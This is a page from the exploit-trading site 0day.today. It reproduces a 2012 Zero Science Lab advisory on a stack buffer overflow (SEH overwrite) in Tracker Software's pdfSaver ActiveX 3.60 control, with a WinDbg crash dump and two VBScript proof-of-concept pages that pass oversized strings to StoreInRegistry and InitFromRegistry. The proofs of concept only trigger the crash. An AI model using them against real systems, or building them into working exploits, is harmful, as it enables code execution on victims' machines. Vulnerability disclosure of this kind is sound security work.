0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Tracker Software pdfSaver ActiveX 3.60 (pdfxctrl.dll) Stack Buffer (SEH)
Tracker Software pdfSaver ActiveX 3.60 (pdfxctrl.dll) Stack Buffer Overflow (SEH) Vendor: ------- Tracker Software Products Ltd. Product web page: ----------------- http://www.tracker-software.com Affected version: ----------------- 3.60.0128 Summary: -------- PDF-Saver Technology is a unique new feature of PDF-XChange software which allows printing jobs to be combined prior to the final PDF file being generated - (e.g. to join 3 pages of Excel spreadsheet, 5 slides of PowerPoint presentation and 10 pages of Word document into one PDF document). Description: ------------ The PDF Printer Preferences ActiveX suffers from a buffer overflow vulnerability. When a large buffer is sent to the sub_path item of the StoreInRegistry function, and the sub_key item of the InitFromRegistry function, in pdfxctrl.dll module, we get a SEH overwrite. An attacker can gain access to the system of the affected node and execute arbitrary code. ------------------------------------------------------------------------ (1fac.1ea8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0013e9e0 ebx=00000003 ecx=0000008c edx=00001815 esi=0013cd74 edi=0013fffd eip=7c834d8f esp=0013b75c ebp=0013b780 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206 kernel32!lstrcatA+0x36: 7c834d8f f3a5 rep movs dword ptr es:[edi],dword ptr [esi] 0:000> !exchain 0013b770: kernel32!_except_handler3+0 (7c839ac0) CRT scope 0, filter: kernel32!lstrcatA+45 (7c84086d) func: kernel32!lstrcatA+49 (7c840876) 0013f1ac: 41414141 Invalid exception stack at 41414141 0:000> d esp 0013b75c 2a 30 00 00 cc 63 18 00-03 00 00 00 5c b7 13 00 *0...c......\... 0013b76c 2a 30 00 00 ac f1 13 00-c0 9a 83 7c a8 4d 83 7c *0.........|.M.| 0013b77c 00 00 00 00 e4 ed 13 00-e7 d8 01 10 e0 e9 13 00 ................ 0013b78c 90 b7 13 00 41 41 41 41-41 41 41 41 41 41 41 41 ....AAAAAAAAAAAA 0013b79c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0013b7ac 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0013b7bc 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0013b7cc 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA ------------------------------------------------------------------------ Tested on: ---------- Microsoft Windows XP Professional SP3 (EN) Vulnerability discovered by: ---------------------------- Gjoko 'LiquidWorm' Krstic liquidworm gmail com Zero Science Lab - http://www.zeroscience.mk Advisory ID: ------------ ZSL-2012-5067 Advisory URL: ------------- http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5067.php 25.01.2012 PoC (COMRaider): ---------------- <object classid='clsid:2EE01CFA-139F-431E-BB1D-5E56B4DCEC18' id='zsl' /> <script language='vbscript'> targetFile = "C:\PDF-XChange\pdfSaver\pdfxctrl.dll" prototype = "Sub StoreInRegistry ( ByVal page_id As PdfPrinterDialogPage , ByVal sub_path As String )" memberName = "StoreInRegistry" progid = "pdfxctrlLib.PdfPrinterPreferences" argCount = 2 arg1=1 arg2=String(6164, "A") zsl.StoreInRegistry arg1 ,arg2 </script> -------------------- <object classid='clsid:2EE01CFA-139F-431E-BB1D-5E56B4DCEC18' id='zsl' /> <script language='vbscript'> targetFile = "C:\PDF-XChange\pdfSaver\pdfxctrl.dll" prototype = "Sub InitFromRegistry ( ByVal page_id As PdfPrinterDialogPage , ByVal sub_key As String )" memberName = "InitFromRegistry" progid = "pdfxctrlLib.PdfPrinterPreferences" argCount = 2 arg1=1 arg2=String(14356, "A") zsl.InitFromRegistry arg1 ,arg2 </script> # 0day.today [2024-12-26] #